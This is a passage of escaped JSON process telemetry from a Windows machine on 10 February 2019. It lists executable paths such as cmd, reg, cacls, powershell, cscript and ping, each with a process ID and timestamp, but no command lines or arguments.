03:45:34.330000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x48c2019-02-10 03:45:34.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x19f02019-02-10 03:45:34.560000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5c42019-02-10 03:45:34.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db42019-02-10 03:45:34.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12cc2019-02-10 03:45:47.757000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1df82019-02-10 03:45:47.787000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1ff82019-02-10 03:46:17.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd782019-02-10 03:46:17.073000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xdd02019-02-10 03:46:32.210000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12f82019-02-10 03:46:32.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xf942019-02-10 03:46:57.410000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1eb42019-02-10 03:46:57.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x582019-02-10 03:47:08.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x135c2019-02-10 03:47:08.527000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b282019-02-10 03:47:13.587000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e602019-02-10 03:47:13.610000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xf902019-02-10 03:47:13.623000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5082019-02-10 03:47:13.637000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x21b02019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x3782019-02-10 03:47:37.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21682019-02-10 03:47:37.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2542019-02-10 03:47:37.827000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23282019-02-10 03:48:01.003000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18342019-02-10 03:48:01.020000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xcc02019-02-10 03:48:24.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x15f82019-02-10 03:48:24.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f7c2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x22fc2019-02-10 03:48:49.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15c02019-02-10 03:48:49.297000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19c82019-02-10 03:48:49.317000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19e82019-02-10 03:48:49.327000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xf982019-02-10 03:48:49.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xbbc2019-02-10 03:48:49.370000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb702019-02-10 03:48:49.387000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15902019-02-10 03:48:49.400000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22982019-02-10 03:48:49.417000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xe582019-02-10 03:48:49.433000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x15e42019-02-10 03:48:49.447000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1f002019-02-10 03:48:49.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x23842019-02-10 03:48:49.477000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xa242019-02-10 03:48:49.490000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10702019-02-10 03:48:49.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1df42019-02-10 03:49:12.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20442019-02-10 03:49:12.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15202019-02-10 03:49:36.040000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xedc2019-02-10 03:49:36.060000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16342019-02-10 03:49:59.250000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b282019-02-10 03:49:59.270000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xd7c2019-02-10 03:50:22.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x182c2019-02-10 03:50:22.503000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x20702019-02-10 03:50:45.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f2c2019-02-10 03:50:45.753000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x6f82019-02-10 03:51:08.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10c42019-02-10 03:51:08.957000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x1de42019-02-10 03:51:32.143000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5ac2019-02-10 03:51:32.160000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x8642019-02-10 03:51:55.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5182019-02-10 03:51:56.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d442019-02-10 03:52:19.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x48c2019-02-10 03:52:19.367000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xb102019-02-10 03:52:42.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5c42019-02-10 03:52:42.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23ec2019-02-10 03:53:05.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xde42019-02-10 03:53:05.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x20e42019-02-10 03:53:15.997000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8382019-02-10 03:53:16.010000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x19142019-02-10 03:53:35.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 03:53:35.183000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f7c2019-02-10 03:53:45.243000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7c02019-02-10 04:08:29.163000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x18442019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9002019-02-10 04:08:35.183000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x22c02019-02-10 04:28:02.247000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe0x1ef42019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11ec2019-02-10 04:32:15.800000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1d3c2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x20102019-02-10 05:10:21.820000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1fa42019-02-10 05:28:02.243000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x195c2019-02-10 06:00:00.807000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x6002019-02-10 06:21:59.853000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xc602019-02-10 06:28:02.250000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x1ce82019-02-10 06:33:53.853000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7702019-02-10 06:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb702019-02-10 06:44:47.457000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1f842019-02-10 06:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xed82019-02-10 06:44:47.490000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x21b42019-02-10 06:44:59.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19982019-02-10 06:44:59.600000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22042019-02-10 06:45:17.783000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 06:45:17.803000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22b02019-02-10 06:45:22.820000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xa2c2019-02-10 06:45:22.837000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x1a002019-02-10 06:45:22.850000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x3c42019-02-10 06:45:22.867000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1de42019-02-10 06:45:22.897000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21782019-02-10 06:45:23.110000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9802019-02-10 06:45:23.133000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1fe02019-02-10 06:45:23.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1fa42019-02-10 06:45:23.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x14ec2019-02-10 06:45:23.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xcc82019-02-10 06:45:23.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xfcc2019-02-10 06:45:23.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12802019-02-10 06:45:23.260000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x6f82019-02-10 06:45:23.473000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1a5c2019-02-10 06:45:23.487000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8bc2019-02-10 06:45:23.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e42019-02-10 06:45:23.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f602019-02-10 06:45:30.647000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10a42019-02-10 06:45:30.673000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x107c2019-02-10 06:45:32.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21302019-02-10 06:45:32.730000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x13382019-02-10 06:45:48.870000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc682019-02-10 06:45:48.900000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x21d42019-02-10 06:45:49.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa942019-02-10 06:45:49.943000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x8f02019-02-10 06:46:18.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c202019-02-10 06:46:18.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x10bc2019-02-10 06:46:47.443000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12cc2019-02-10 06:46:47.473000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x13a82019-02-10 06:47:03.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb482019-02-10 06:47:03.653000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23d82019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15fc2019-02-10 06:47:25.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22982019-02-10 06:47:25.847000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1a442019-02-10 06:47:25.863000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x21b42019-02-10 06:47:47.063000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19282019-02-10 06:47:47.080000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xdd82019-02-10 06:48:08.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14882019-02-10 06:48:08.320000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1fa42019-02-10 06:48:29.533000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8502019-02-10 06:48:29.587000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x18982019-02-10 06:48:51.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21202019-02-10 06:48:51.720000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8542019-02-10 06:49:12.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x91c2019-02-10 06:49:12.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22f42019-02-10 06:49:34.150000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb642019-02-10 06:49:34.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1a9c2019-02-10 06:49:55.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17d02019-02-10 06:49:55.377000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17d82019-02-10 06:50:16.557000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd142019-02-10 06:50:16.580000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x128c2019-02-10 06:50:37.767000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb042019-02-10 06:50:37.800000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x1c202019-02-10 06:50:58.953000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13602019-02-10 06:50:58.973000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19f02019-02-10 06:51:20.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db02019-02-10 06:51:20.220000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb602019-02-10 06:51:41.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x125c2019-02-10 06:51:41.400000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15902019-02-10 06:52:02.617000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11a82019-02-10 06:52:02.650000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19142019-02-10 06:52:23.833000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10582019-02-10 06:52:23.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x15182019-02-10 06:52:48.113000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5a82019-02-10 06:52:48.127000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x53c2019-02-10 06:53:19.340000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13942019-02-10 06:53:19.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8382019-02-10 06:53:20.400000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x15a82019-02-10 07:28:02.247000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1cdc2019-02-10 08:28:02.253000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x19482019-02-10 09:07:02.863000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x6342019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e8c2019-02-10 09:13:15.387000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x181c2019-02-10 09:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e682019-02-10 09:44:47.263000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23482019-02-10 09:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x125c2019-02-10 09:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13742019-02-10 09:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xd582019-02-10 09:45:02.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22302019-02-10 09:45:02.660000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x13c02019-02-10 09:45:21.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4e02019-02-10 09:45:21.843000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12e02019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xbd02019-02-10 09:45:46.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe582019-02-10 09:45:46.153000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x18502019-02-10 09:45:46.167000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x23ec2019-02-10 09:45:46.190000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16f42019-02-10 09:45:46.210000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b742019-02-10 09:45:46.247000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x12d02019-02-10 09:45:46.273000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16102019-02-10 09:45:46.290000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x6482019-02-10 09:45:46.313000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x23b82019-02-10 09:45:46.323000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xf542019-02-10 09:45:46.347000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x20b02019-02-10 09:45:46.370000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1dec2019-02-10 09:45:46.383000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1bbc2019-02-10 09:45:46.417000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xa242019-02-10 09:45:46.430000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16bc2019-02-10 09:45:46.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf802019-02-10 09:45:46.500000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xf082019-02-10 09:45:48.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xe502019-02-10 09:45:48.553000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x4902019-02-10 09:45:57.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa582019-02-10 09:45:57.657000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b002019-02-10 09:46:15.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23a42019-02-10 09:46:15.843000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d9c2019-02-10 09:46:24.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13982019-02-10 09:46:24.950000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xb282019-02-10 09:46:37.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21642019-02-10 09:46:37.080000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11982019-02-10 09:46:58.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd042019-02-10 09:46:58.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xce02019-02-10 09:46:58.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x3b82019-02-10 09:46:58.327000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f602019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x10ac2019-02-10 09:47:18.497000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb382019-02-10 09:47:18.510000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14802019-02-10 09:47:18.533000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xe2c2019-02-10 09:47:37.713000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 09:47:37.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x20482019-02-10 09:47:56.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x128c2019-02-10 09:47:56.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xed82019-02-10 09:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x107c2019-02-10 09:48:16.877000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x13f82019-02-10 09:48:36.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19402019-02-10 09:48:36.513000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x212c2019-02-10 09:48:55.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f882019-02-10 09:48:55.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xbd02019-02-10 09:49:15.120000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4382019-02-10 09:49:15.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xbd82019-02-10 09:49:34.323000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x115c2019-02-10 09:49:34.340000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x203c2019-02-10 09:49:53.497000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 09:49:53.520000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23282019-02-10 09:50:12.667000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b282019-02-10 09:50:12.697000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xfe02019-02-10 09:50:31.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2582019-02-10 09:50:31.913000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x7702019-02-10 09:50:51.110000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x84c2019-02-10 09:50:51.897000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2482019-02-10 09:51:11.057000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20182019-02-10 09:51:11.070000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xd702019-02-10 09:51:30.233000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xccc2019-02-10 09:51:30.253000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16802019-02-10 09:51:49.427000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12602019-02-10 09:51:49.493000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x23f82019-02-10 09:51:54.560000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1bb42019-02-10 09:51:54.577000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xcfc2019-02-10 09:52:04.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xdd82019-02-10 09:52:04.717000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14082019-02-10 09:52:29.923000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1ce82019-02-10 10:28:02.243000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1d082019-02-10 11:28:02.237000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x11782019-02-10 11:46:27.867000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x1dd82019-02-10 12:00:00.817000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x10c42019-02-10 12:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8f82019-02-10 12:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20182019-02-10 12:44:47.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17ec2019-02-10 12:44:47.453000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5942019-02-10 12:44:47.473000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x1f882019-02-10 12:45:04.610000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14d82019-02-10 12:45:04.627000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1b282019-02-10 12:45:24.803000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfc02019-02-10 12:45:24.827000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xfc82019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23a82019-02-10 12:45:35.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16802019-02-10 12:45:35.893000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23e82019-02-10 12:45:35.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x55c2019-02-10 12:45:35.923000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xadc2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x13982019-02-10 12:45:36.087000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17502019-02-10 12:45:36.113000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x11f02019-02-10 12:45:36.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5ac2019-02-10 12:45:36.163000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xa902019-02-10 12:45:36.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xc4c2019-02-10 12:45:36.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb002019-02-10 12:45:36.230000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x154c2019-02-10 12:45:36.257000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xeb02019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x9602019-02-10 12:45:36.440000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x158c2019-02-10 12:45:36.470000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1be02019-02-10 12:45:36.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x2dc2019-02-10 12:45:36.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x221c2019-02-10 12:45:36.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xc982019-02-10 12:46:05.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2482019-02-10 12:46:05.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x18782019-02-10 12:46:22.017000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x84c2019-02-10 12:46:22.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x18982019-02-10 12:46:42.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6c02019-02-10 12:46:42.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x125c2019-02-10 12:46:59.397000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13742019-02-10 12:46:59.413000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xf582019-02-10 12:47:28.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-10 12:47:28.670000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xefc2019-02-10 12:47:41.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13d82019-02-10 12:47:41.813000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x19e82019-02-10 12:47:57.960000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x7fc2019-02-10 12:47:57.977000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x107c2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x19f42019-02-10 12:48:16.093000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20202019-02-10 12:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x9182019-02-10 12:48:16.123000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xf202019-02-10 12:48:33.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10082019-02-10 12:48:33.317000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x23ec2019-02-10 12:48:51.180000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22742019-02-10 12:48:51.207000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f882019-02-10 